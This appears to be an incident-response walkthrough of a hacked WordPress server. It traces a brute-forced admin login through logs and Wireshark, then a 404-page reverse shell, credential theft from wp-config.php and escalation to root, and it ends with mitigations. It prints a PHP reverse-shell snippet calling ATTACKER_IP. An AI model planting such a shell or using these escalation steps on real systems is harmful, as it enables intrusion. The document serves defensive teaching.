Hacked Web Server Analysis Example

Hacked Web Server Analysis: A Detailed Walkthrough

This analysis provides insights into how a WordPress-based web server was compromised and offers practical steps for detection, response, and prevention.

1. Brute Force Attack Detection on Admin Panel

Log Analysis

The attack begins with a brute force attempt on the WordPress login page (wp-login.php).

Command:

cat access.log | grep POST | grep wp-login

Observation: The logs show numerous POST requests from the same IP (192.168.2.232), targeting wp-login.php. This indicates repeated login attempts.
Example Log Entry:
```
192.168.2.232 - - [12/Nov/2024:14:00:12 +0000] "POST /wp-login.php HTTP/1.1" 200 2456
```

Network Traffic Analysis

Wireshark confirms the brute force attack by filtering for POST requests to the server.

Wireshark Filter:

ip.src == 192.168.2.232 && http.request.method == POST

Result: Multiple login attempts, eventually leading to successful credential discovery (admin:admin).

2. Exploitation via Admin Panel

Once logged in, the attacker exploits their access to upload malicious code and modify the 404 error page.

Error Log Analysis

The attacker’s activity is evident in the error logs.

Command:
```
cat error.log
```

Key Entry:

[12/Nov/2024:14:30:45 +0000] [error] [client 192.168.2.232] PHP Warning:  fscockopen() error in /words/test123123.php

This log suggests the attacker used the fsockopen() function for malicious purposes.

3. Malicious 404 Error Page

The attacker modifies the 404 error page to establish a reverse shell connection.

Injected Code:

<?php
$socket = fsockopen("ATTACKER_IP", 1234);
exec("/bin/bash -i <&3 >&3 2>&3");
?>

Functionality:
- Opens a connection to the attacker’s system.
- Provides shell access with the www-data user’s privileges.

4. Escalation to Root Privileges

Reading Sensitive Configuration Files

The attacker reads the WordPress configuration file to extract database credentials.

Command:
```
cat /var/www/html/wp-config.php
```
Critical Finding:
```
define('DB_PASSWORD', 'rootpassword');
```

The database password is the same as the root user’s password, enabling privilege escalation.

Root Privilege Escalation

Using the compromised credentials, the attacker switches to the root user.

Command:
```
su root
```
Full System Control: The attacker achieves root-level access, enabling unrestricted control.

5. Attack Steps

1. Brute Force Attack:

Gained WordPress admin credentials (admin:admin) via brute force on wp-login.php.

2. Malicious Code Injection:

Modified the 404 error page with a reverse shell script.

3. Credential Harvesting:

Extracted database credentials from wp-config.php.

4. Privilege Escalation:

Used database credentials to switch to the root account.

5. Root Compromise:

Gained full control over the server.

Mitigation and Protection Strategies

1. Enforce Strong Credentials

Use complex, unique passwords for:
- WordPress admin accounts.
- Database credentials.
- Root accounts.
Use password managers to prevent reuse and ensure strong password policies.

Deploy plugins like Limit Login Attempts Reloaded.
Automatically block IPs after multiple failed login attempts.

3. Regular Updates and Patches

Update WordPress, plugins, and server software to address known vulnerabilities.
Regularly monitor the WordPress Vulnerability Database.

4. Restrict Error Reporting

Disable verbose error reporting to prevent sensitive information leakage:
```
ini_set('display_errors', 0);
ini_set('log_errors', 1);
```

5. Monitor Logs and Traffic

Use centralized logging solutions like ELK Stack or Splunk.
Implement Intrusion Detection Systems (IDS) to detect anomalous traffic in real time.

6. Principle of Least Privilege

Ensure that WordPress and the web server run under non-root accounts.
Avoid using the same password for different system components.

7. File Integrity Monitoring

Use tools like Tripwire or OSSEC to monitor changes in critical files (e.g., 404.php).

8. Web Application Firewall (WAF)

Deploy a WAF (e.g., Cloudflare or ModSecurity) to block:
- Brute force attacks.
- Malicious payloads.
- Suspicious query strings (e.g., SQL Injection).

Conclusion

This incident underscores the importance of proactive security measures and continuous monitoring. A single weak point, such as a poorly secured admin panel, can lead to full system compromise. Implementing best practices, monitoring logs, and maintaining up-to-date software are critical for preventing similar attacks.

PreviousDiscovering the Web Shell NextLog Analysis with Sysmon

Last updated 1 year ago

hashtagHacked Web Server Analysis: A Detailed Walkthrough

hashtag1. Brute Force Attack Detection on Admin Panel

hashtag2. Exploitation via Admin Panel

hashtag3. Malicious 404 Error Page

hashtag4. Escalation to Root Privileges

hashtag5. Attack Steps

hashtag1. Brute Force Attack:

hashtag2. Malicious Code Injection:

hashtag3. Credential Harvesting:

hashtag4. Privilege Escalation:

hashtag5. Root Compromise:

hashtagMitigation and Protection Strategies

hashtag1. Enforce Strong Credentials

hashtag2. Limit Login Attempts

hashtag3. Regular Updates and Patches

hashtag4. Restrict Error Reporting

hashtag5. Monitor Logs and Traffic

hashtag6. Principle of Least Privilege

hashtag7. File Integrity Monitoring

hashtag8. Web Application Firewall (WAF)

hashtagConclusion